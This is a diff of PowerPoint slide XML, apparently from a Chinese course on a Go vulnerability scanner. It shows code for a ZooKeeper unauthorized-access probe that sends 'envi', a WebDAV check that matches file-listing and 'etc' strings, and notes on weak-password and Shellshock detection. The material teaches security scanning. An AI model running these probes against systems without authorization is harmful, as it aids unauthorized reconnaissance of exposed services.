-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Contains</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>drwxr</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>xr</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>-x"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>) &amp;&amp; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="AFBF7E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>strings</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="B09D79"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Contains</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>etc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="6A8759"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>) {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      result := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="4EADE5"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.info</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>result.Response</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>result.Request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>resp.RequestRaw</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="4EADE5"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>append</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="4EADE5"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
-              <a:t>.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="CC7832"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>result)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>return true</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="C7773E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>核心模块精讲</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1785634911"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688000681"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8374,7 +6995,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B8DE4A-EECC-1A4A-85F2-A2490DCCC6A9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20AD45B8-AA01-AD47-9029-FB3A2B849706}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -8387,8 +7008,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913775" y="618518"/>
-            <a:ext cx="10364452" cy="696716"/>
+            <a:off x="789139" y="275572"/>
+            <a:ext cx="9862785" cy="686518"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -8396,30 +7017,22 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Web</a:t>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>Zk</a:t>
             </a:r>
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>dav</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>检测</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="文本框 2">
+              <a:t>弱密码检测</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C62A8A7-AF2A-6845-ACED-09D6760A16E1}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A29637-D4BD-5345-ACE1-2F0FACF550A2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -8428,8 +7041,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1728592" y="1578279"/>
-            <a:ext cx="8680537" cy="923330"/>
+            <a:off x="1415441" y="1816274"/>
+            <a:ext cx="9862785" cy="4801314"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8443,68 +7056,324 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>dav</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>模块会检测</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>服务器是否</a:t>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>func</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> (d *</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>zookeeperUnauth</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) Check(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>netloc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> string, meta </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>plugin.TaskMeta</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>) bool {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>buf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>util.TCPSend</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>netloc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, []byte("</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>envi</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>"), 15)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err != nil {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>err.Error</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>())</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   if err == nil &amp;&amp; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>strings.Contains</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(string(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>buf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>), "Environment") {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      result := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.info</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Sprintf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("zookeeper://%s", </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>netloc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Response</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = string(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>buf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>result.Remarks</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Sprintf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>("</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>开启了</a:t>
+              <a:t>未授权访问，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>s", </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>WebDav</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>且配置不当导致攻击者可上传文件到</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>目录，实现逻辑就是会尝试发起</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>put</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>请求，然后想服务器发送一个测试文件，然后再使用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>get</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>请求，看看能不能获取这个文件，代码在下面的一个</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>ppt</a:t>
+              <a:t>result.Remarks</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t> = append(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>, result)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>fmt.Println</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>d.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>      return true</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   }</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>   return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>}</a:t>
             </a:r>
             <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
@@ -8512,10 +7381,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="文本框 3">
+          <p:cNvPr id="5" name="文本框 4">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3288819B-A848-2E4D-8B59-86723555BBF2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AB99DB9-4634-1E48-B326-5CF4257E6E24}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -8524,8 +7393,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1227551" y="2818356"/>
-            <a:ext cx="10258816" cy="3569918"/>
+            <a:off x="1164921" y="1252603"/>
+            <a:ext cx="9983243" cy="646331"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8538,14 +7407,41 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>弱密码检测就是想</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>zk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>服务器发送一些默认的密码，如果</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>zk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>有了响应，那么就可以判定改</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>zk</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>服务器存在弱密码泄露现象</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414903076"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2605024454"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8574,10 +7470,47 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="文本框 3">
+          <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFD9FA4-EA5D-6344-8EC9-08A4C3502894}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B8DE4A-EECC-1A4A-85F2-A2490DCCC6A9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913775" y="618518"/>
+            <a:ext cx="10364452" cy="696716"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Shell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>破壳检测</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="文本框 6">
+            <a:extLst>
